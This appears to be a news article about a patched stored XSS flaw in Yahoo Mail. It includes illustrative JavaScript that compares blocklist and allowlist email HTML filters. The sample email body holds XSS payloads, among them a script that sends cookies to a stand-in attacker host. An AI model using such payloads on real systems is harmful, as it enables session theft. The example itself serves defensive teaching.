Security experts shudder every time a multinational company is found vulnerable to attack. Such stories should never be underestimated: a disclosed vulnerability in a service of that size usually leaves millions of users exposed.
Let's take a look at Yahoo! and the stored XSS (cross-site scripting) vulnerability that could have allowed attackers to compromise users' email accounts simply by sending them a malicious email. To be clear about that last part: to exploit the vulnerability, the only action required of the victim was opening and viewing the email. No link had to be clicked and no attachment opened. Nothing more.
Who Discovered the XSS Vulnerability in Yahoo?
The Finnish researcher Jouko Pynnönen discovered and reported the bug. This is what he wrote in his original post, titled Yahoo Mail Stored XSS:
A stored XSS vulnerability in Yahoo Mail was patched earlier this month. The flaw allowed malicious JavaScript code to be embedded in a specially formatted email message. The code would be automatically evaluated when the message was viewed. The JavaScript could be used to e.g. compromise the account, change its settings, and forward or send email without the user’s consent.
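The mechanism described above, a message body whose HTML is rendered by the webmail client so that any script the filter lets through runs in the recipient's session, is easiest to see with a small filter. The following is an added example written for this article; it is not Yahoo's filter, not the bypass Pynnönen found, and not code from his post. The sample email, the domains `evil.example` and `cdn.example`, and the function names `blocklistFilter`, `sanitizeAllowlist` and `hasScriptVector` are all constructed for illustration.

```javascript
// Added example (not from the article, from Yahoo or from Jouko Pynnönen):
// how a webmail client's HTML filter decides whether attacker-supplied markup
// in a message body can run script when the recipient merely opens the mail.
// Everything here is constructed for illustration; it is not the filter Yahoo
// used nor the bypass the researcher reported.

// Constructed HTML email body carrying three common script vectors.
const CONSTRUCTED_EMAIL_HTML =
  '<p>Hi <b>there</b>, see the invoice below.</p>' +
  '<script>fetch("https://evil.example/?c=" + document.cookie)</script>' +
  '<img src="https://cdn.example/inv.png" onerror="alert(document.cookie)">' +
  '<a href="javascript:alert(1)">Open invoice</a>';

// Naive blocklist filter: strips <script> elements and nothing else. Script can
// still run from event-handler attributes and javascript: URLs, which is why
// this style of filtering keeps producing stored-XSS bugs in webmail.
function blocklistFilter(html) {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, '');
}

// Allowlist filter: re-serialises the message from a fixed set of permitted
// tags and attributes. Anything not listed is dropped: every on* handler,
// every unknown tag, and every URL whose scheme is not http(s) or mailto.
const ALLOWED_TAGS = new Set(['p', 'b', 'i', 'br', 'a', 'img']);
const ALLOWED_ATTRS = { a: new Set(['href']), img: new Set(['src', 'alt']) };
const URL_ATTRS = new Set(['href', 'src']);
const SAFE_URL = /^(https?:|mailto:)/i;            // checked after trimming
const DROP_CONTENT = new Set(['script', 'style']); // discard their inner text too

const escapeText = (s) =>
  s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
const escapeAttr = (s) => escapeText(s).replace(/"/g, '&quot;');

function sanitizeAllowlist(html) {
  // Tokeniser: an open/close tag or a run of text. A bare "<" that does not
  // start a tag is skipped, so malformed markup fails closed. A real
  // deployment should use a full HTML parser; this regex tokeniser is only
  // enough to show the allowlist decision.
  const TOKEN = /<(\/?)([a-z][a-z0-9]*)\b([^>]*)>|([^<]+)/gi;
  const ATTR = /([a-z][a-z0-9-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/gi;
  let out = '';
  let skipUntil = null; // set while inside <script> or <style>

  for (const m of html.matchAll(TOKEN)) {
    const [, slash, rawName, rawAttrs, text] = m;
    if (text !== undefined) {
      if (!skipUntil) out += escapeText(text);
      continue;
    }
    const name = rawName.toLowerCase();
    if (skipUntil) {
      if (slash && name === skipUntil) skipUntil = null;
      continue;
    }
    if (DROP_CONTENT.has(name)) {
      if (!slash) skipUntil = name;
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) continue;
    if (slash) { out += `</${name}>`; continue; }

    let attrs = '';
    for (const a of rawAttrs.matchAll(ATTR)) {
      const attr = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? '';
      if (!(ALLOWED_ATTRS[name]?.has(attr))) continue;                  // drops onerror etc.
      if (URL_ATTRS.has(attr) && !SAFE_URL.test(value.trim())) continue; // drops javascript:
      attrs += ` ${attr}="${escapeAttr(value)}"`;
    }
    out += `<${name}${attrs}>`;
  }
  return out;
}

// Crude detector used only to show what survives each filter.
function hasScriptVector(html) {
  return /<script\b|\son[a-z]+\s*=|javascript:/i.test(html);
}

console.log('blocklist :', blocklistFilter(CONSTRUCTED_EMAIL_HTML));
console.log('allowlist :', sanitizeAllowlist(CONSTRUCTED_EMAIL_HTML));
```

Run with Node: the blocklist output still contains the `onerror` handler and the `javascript:` link, so the script would run as soon as the message is rendered; the allowlist output keeps only the formatting and the image. In production, use a maintained sanitizer such as DOMPurify rather than a hand-written tokeniser, and render message bodies in a sandboxed frame on a separate origin so that any filter miss cannot reach the mailbox session.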
All Versions of Yahoo Mail Affected, Mobile App Aside
The vulnerability affected all versions of the Yahoo Mail service except the mobile app. What makes this particularly worrying is the size of the user base: Yahoo is the second largest email service in the world, with almost 300 million accounts registered as of February 2014.
Fortunately, Yahoo says the bug was not exploited and was fixed on January 6, before any damage was done.
Jouko Pynnönen has also made a video that illustrates the potential exploit.
This is not the first XSS bug found in Yahoo Mail, and it will probably not be the last. Yahoo, like many other large providers, runs a bug bounty program that encourages independent researchers to report the bugs they discover. For this particular report, Pynnönen was awarded $10,000.